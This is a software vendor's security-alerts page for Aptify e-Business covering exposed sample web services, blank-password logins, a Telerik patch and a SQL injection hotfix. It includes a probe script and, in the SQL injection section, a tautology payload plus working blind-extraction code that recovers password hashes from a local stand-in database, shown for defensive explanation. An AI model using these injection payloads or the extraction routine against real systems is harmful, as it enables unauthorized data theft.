
e-Business Security Alerts

This page lists known security vulnerabilities in Aptify e-Business that could apply to your installation. If you are using Aptify e-Business, review the alerts below for information on these vulnerabilities and how to address them.

The information on this page is cross-posted in Aptify's Freshdesk instance here: https://aptify.freshdesk.com/support/solutions/folders/6000232121

Security Alert: Remove Sample XML Web Services If Not Using Them

Date Updated: February 19, 2018

The starter sites for the ASP.NET version of Aptify e-Business (that is, e-Business versions 5.5.3 and earlier) include a set of sample XML Web Services that demonstrate how to interact with Aptify using SOAP-based Web Services. 

These Web Services perform no authentication or authorization by default, so if they are active on your production site without modification from what is provided with the starter sites, an unauthorized user may be able to retrieve or update data in your Aptify system.

The Web Services are:

  • GetOrderInfo.asmx
  • GetProductListing.asmx
  • UpdatePerson.asmx

If these services and their corresponding VB code-behind files exist on your system and you have not modified them in any way, remove them from your production Web server immediately, following the steps below.

Versions affected

These Web Services are included in the starter site for all versions of Aptify e-Business from 5.0 through 5.5.3 (this alert does not apply to e-Business Apollo, that is, e-Business 5.5.5 and later). If your Web site is based on the e-Business ASP.NET starter site or the Sitefinity starter site, your Web site may be vulnerable to unauthorized access.

How to tell if you are impacted

On your production e-Business Web site, append WebServices/UpdatePerson.asmx to your e-Business base URL (for example, https://www.<<yourWebSiteHere>>/WebServices/UpdatePerson.asmx) and load that address in a browser. If the server returns the ASP.NET Web Service description page (the page that lists the service's supported operations and links to its Service Description), the sample Web Services are active on your Web site. A 404 response or your site's normal error page means the service is not reachable at that path. Repeat the check for GetOrderInfo.asmx and GetProductListing.asmx; loading the description page does not invoke any of the service's operations, so the check is safe to run against production.
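The same check can be scripted so that all three sample services are probed in one pass. The following is an added example, not code from Aptify or the e-Business starter site: it requests each sample .asmx under the WebServices folder of a base URL you supply and recognises the ASP.NET service description page by the standard phrases it contains. The base URL https://www.example.com/ and the sample HTML used in the self-test are placeholders; the path layout (WebServices/<name>.asmx under the site root) is the one the alert describes.

```python
"""Probe a production e-Business site for the three sample XML Web Services."""
import sys
import urllib.error
import urllib.request
from urllib.parse import urljoin

# The sample services named in this alert, served from <site root>/WebServices/.
SAMPLE_SERVICES = ("GetOrderInfo.asmx", "GetProductListing.asmx", "UpdatePerson.asmx")

# Phrases on the auto-generated ASP.NET .asmx description page (the page that lists
# a service's operations). A CMS 404 page or a login redirect will not contain both.
ASMX_MARKERS = ("The following operations are supported", "Service Description")


def service_url(base_url: str, name: str) -> str:
    """Build the URL to probe: https://host/eBusiness/ -> https://host/eBusiness/WebServices/<name>."""
    return urljoin(base_url.rstrip("/") + "/", "WebServices/" + name)


def looks_like_asmx_help_page(body: str) -> bool:
    """True when the response body is the ASP.NET service description page."""
    return all(marker in body for marker in ASMX_MARKERS)


def probe_sample_services(base_url: str, timeout: float = 10.0) -> dict:
    """GET each sample service and classify it. A plain GET only renders the description
    page; it does not invoke any operation, so it is safe to run against production."""
    results = {}
    for name in SAMPLE_SERVICES:
        url = service_url(base_url, name)
        try:
            with urllib.request.urlopen(url, timeout=timeout) as resp:
                body = resp.read().decode("utf-8", errors="replace")
                if looks_like_asmx_help_page(body):
                    results[name] = "EXPOSED"
                else:
                    results[name] = "HTTP %d but not a service page" % resp.status
        except urllib.error.HTTPError as err:   # 4xx/5xx: service not reachable at this path
            results[name] = "HTTP %d" % err.code
        except urllib.error.URLError as err:    # DNS/TLS/connection problems
            results[name] = "error: %s" % err.reason
    return results


if __name__ == "__main__":
    # Placeholder base URL; pass your real e-Business base URL as the first argument.
    base = sys.argv[1] if len(sys.argv) > 1 else "https://www.example.com/"
    for svc, status in probe_sample_services(base).items():
        print("%-26s %s" % (svc, status))
```

Any service reported as EXPOSED should be removed using the steps in this alert; a "not a service page" result with HTTP 200 usually means the CMS served its own not-found page, which is fine. If your site is installed under a virtual directory, pass that directory as part of the base URL (for example https://www.example.com/eBusiness/).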

Possible location for the Web Services

Locate the e-Business folder on your Web server. It is typically found within the wwwroot sub-folder of the inetpub folder (for example, inetpub\wwwroot\eBusiness), but the exact location depends on where e-Business was installed. Within the e-Business folder, look for a sub-folder named WebServices.

If you are unsure of the folder or have renamed the folder, you can locate the appropriate files using the Internet Information Services (IIS) Manager:

  1. Open IIS Manager.
  2. Browse to your site in the console tree.
  3. Right-click the site name and select Explore from the context menu.
  4. This opens the site files in a Windows Explorer window. Find the folder named WebServices.

Steps to remove the Web Services

If your site has these Web Services available, follow these steps to remove them:

  1. Browse to the WebServices folder in your e-Business site structure.
  2. Select the files in the folder.
    If you are using Sitefinity, do not select the AptifySitefinityIntegration.asmx file. e-Business uses this Web Service for the out-of-the-box Sitefinity integration, so sites that use Sitefinity should leave this file in place.
  3. Move the files to a new location on the computer, outside of the Web site structure (such as to a temp folder), so that IIS can no longer serve them but you can restore them if needed.
  4. Test your site to confirm you can still log in and access system functionality. No IIS reset is required.
  5. If functionality fails because you were using those Web Services, return the files to the WebServices folder and contact Aptify Support for assistance.

Note that the Web Services also have corresponding VB code-behind files in the e-Business App_Code folder. You can remove those files as well, but note that changing the contents of App_Code causes ASP.NET to recompile the application and restart it (for users, the effect is similar to an IIS reset), so only do this at a time when you are comfortable restarting your Web site:

  1. Browse to the App_Code folder in your e-Business site structure.
  2. Move the following VB files that correspond to the sample Web Services to a new location on the computer, outside of the Web site structure (such as to a temp folder):
    1. GetOrderInfo.asmx.vb
    2. GetProductListing.asmx.vb
    3. UpdatePerson.asmx.vb
  3. Your site will recompile since the App_Code contents have changed. Test your site to confirm you can still log in and access system functionality.

Please create a ticket to contact Aptify Support if you have any questions or concerns about this Security Alert.

Security Alert: Confirm that your site does not allow Web Users to Login with Blank Passwords

Date Updated: February 19, 2018

Certain e-Business sites may allow a Web User to login without providing a password.

This can occur when all of the following are true:

  • Your Web User passwords use the original two-way encryption methodology and not One Way Hash Encryption
  • Your login control is missing an update that prevents blank passwords
  • The EBusinessLogin.dll in your e-Business site's Bin folder is not version 5.5.2.100, 5.5.3.100 or 5.5.5.1

Follow these steps to determine if this applies to your site:

  1. Locate the user name for one of the Web Users on your e-Business site.
  2. Browse to the login page of the production e-Business site.
  3. Enter the user name from Step 1 and click the login button (while leaving the password field blank).

If the login is successful, review Hotfix RES-458 and Issue 23315 to update your site to prevent this situation. The hotfix package is ready for download on the Aptify FTP site in the Version50\APTIFY_555 folder. The file name is Hotfix RES-458 for Ebiz on Aptify 5.5.5 and 5.5.6.zip.

For reference, this hotfix package includes the previous Global hotfix release (APTIFY_EBIZ_552_553_ISSUE_23315_GLOBAL_HOTFIX.zip). Here is the original description of the problem from Issue 23315’s hotfix:

Currently in Aptify e-Business 5.5.2 and 5.5.3, there is a situation where an individual may be able to log in to an e-Business site with a user account name without providing a password. This problem can occur under the following conditions:

  • Your e-Business installation was upgraded from a prior release to e-Business 5.5.2 or 5.5.3.
  • Your e-Business installation is not using one way hash encryption for Web Users passwords, but uses the pre-existing two way encryption. (One way hash encryption was introduced in e-Business 5.5.2.)
  • Your e-Business Login control was not updated with the changes made to the control between e-Business 5.5.1 and e-Business 5.5.2.

This hotfix provides an updated EbusinessLogin.dll (one for e-Business 5.5.2 and one for e-Business 5.5.3) that explicitly prevents attempts to login with no password under the conditions described above. In addition, this hotfix outlines additional changes to consider for your e-Business installation.

Contact Aptify Support if you have any questions about this alert.

Sitefinity Users: You May Need to Apply the Telerik.Web.UI.dll Patch from September 2017

Date Updated: February 19, 2018

In September 2017, Progress notified Sitefinity license holders of security vulnerabilities identified in Sitefinity CMS and provided a patch to Telerik.Web.UI.dll to address them. The issue is tracked as CVE-2017-9248, a cryptographic weakness in Telerik.Web.UI.dll that can allow a remote attacker to defeat the protection of the keys the library relies on.

If you are using Sitefinity version 5.x to 10.x and have not already applied the update, see this article for details:

https://knowledgebase.progress.com/articles/Article/resolving-security-vulnerability-cve-2017-9248

To confirm whether the patched assembly is in place, compare the file version of Telerik.Web.UI.dll in your site's Bin folder (file Properties, Details tab) with the patched version listed in the Progress article.

Please contact Aptify Support if you have any questions about this update with regard to Aptify e-Business. Otherwise, please contact Sitefinity if you have specific questions about the vulnerabilities.

Security Alert: SQL Injection Vulnerability in Profile Control

Date Updated: February 19, 2018

Aptify has identified a SQL injection vulnerability in the code-behind for the baseline Profile control.

The lnkCheckAvailable_Click() handler, which checks whether a user name is available when a new user account is created, builds a simple SQL query from the entered user name and runs it against the database. Because the entered value becomes part of the SQL text, a crafted user name can change the query that is executed.

Aptify has made available a hotfix that updates the function to use a parameterized statement instead, so that the entered value is passed to the database as data rather than as part of the query text.

The hotfix includes steps for updating your version of the Profile control to modify the function. This is the preferred approach since many clients have modified the Profile control based on their individual site requirements. For reference, the hotfix also includes updated e-Business 5.5.3 baseline versions of the Profile.ascx.vb file for the ASP.NET starter site (in the ASP.NET Profile Control folder) and for the Sitefinity starter site (in the Sitefinity Profile Control folder).

The hotfix is available on the Aptify FTP site in the Version50\eBusiness folder (filename: Hotfix RES-415 for e-Business 5.5.3.zip).
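To make the flaw concrete, the following is an added example, not code from the Aptify hotfix or from the Profile control itself. It is written in Python against an in-memory sqlite3 table; the WebUsers table, its columns and its two seed rows are hypothetical stand-ins for the real Aptify schema. It places the vulnerable shape of an availability check (the entered user name concatenated into the SQL text) beside the parameterized form the hotfix adopts, and goes one step beyond the alert to show why a query that answers only "available" or "taken" still matters: that single bit is enough for boolean-based blind extraction of data from other rows.

```python
"""Username-availability check: concatenated SQL vs a parameterized statement (sqlite3 stand-in)."""
import sqlite3
import string

# Constructed seed data; the table and column names are hypothetical, not Aptify's schema.
SEED_ROWS = [("alice", "h4sh-a"), ("bob", "h4sh-b")]


def make_db() -> sqlite3.Connection:
    """Create the in-memory stand-in for the Web Users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE WebUsers (UserName TEXT PRIMARY KEY, PasswordHash TEXT)")
    conn.executemany("INSERT INTO WebUsers VALUES (?, ?)", SEED_ROWS)
    return conn


def is_available_vulnerable(conn: sqlite3.Connection, user_name: str) -> bool:
    """The shape of the flaw in the alert: user input is spliced into the SQL text,
    so a quote character in the name ends the literal and the rest becomes SQL."""
    sql = "SELECT COUNT(*) FROM WebUsers WHERE UserName = '" + user_name + "'"
    (count,) = conn.execute(sql).fetchone()
    return count == 0


def is_available_fixed(conn: sqlite3.Connection, user_name: str) -> bool:
    """Parameterized: the name is bound as data, so quotes in it cannot alter the query."""
    sql = "SELECT COUNT(*) FROM WebUsers WHERE UserName = ?"
    (count,) = conn.execute(sql, (user_name,)).fetchone()
    return count == 0


def extract_via_oracle(oracle, victim: str, length: int) -> str:
    """Boolean-based blind extraction through a yes/no availability check.
    oracle(name) -> True means 'available' (COUNT(*) == 0). The injected condition is
    true for every row when the guessed character is right, so the oracle then answers
    'taken'; a wrong guess leaves the count at zero and the oracle answers 'available'."""
    recovered = ""
    for pos in range(1, length + 1):
        for ch in string.ascii_lowercase + string.digits + "-":
            probe = ("x' OR (SELECT substr(PasswordHash,%d,1) FROM WebUsers "
                     "WHERE UserName='%s')='%s" % (pos, victim, ch))
            if not oracle(probe):       # 'taken' => the guessed character is correct
                recovered += ch
                break
        else:
            break                       # end of the value or character set exhausted
    return recovered


if __name__ == "__main__":
    db = make_db()
    tautology = "x' OR '1'='1"
    print("vulnerable, tautology :", is_available_vulnerable(db, tautology))   # False: query now matches every row
    print("fixed, tautology      :", is_available_fixed(db, tautology))        # True: treated as a literal name
    print("blind extraction (vuln):", extract_via_oracle(lambda n: is_available_vulnerable(db, n), "alice", 6))
    print("blind extraction (fixed):", repr(extract_via_oracle(lambda n: is_available_fixed(db, n), "alice", 6)))
```

In the VB.NET code-behind the parameterized form is the ADO.NET equivalent of is_available_fixed: the SQL text names a parameter (for example @UserName) and the entered value is supplied through the command's Parameters collection rather than concatenated into the string. The exact edits for the Profile control are in the RES-415 hotfix package; when applying them to a customised control, check that no other handler in the same file builds SQL from user input the same way.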

 

 

 

Copyright © 2014-2017 Aptify - Confidential and Proprietary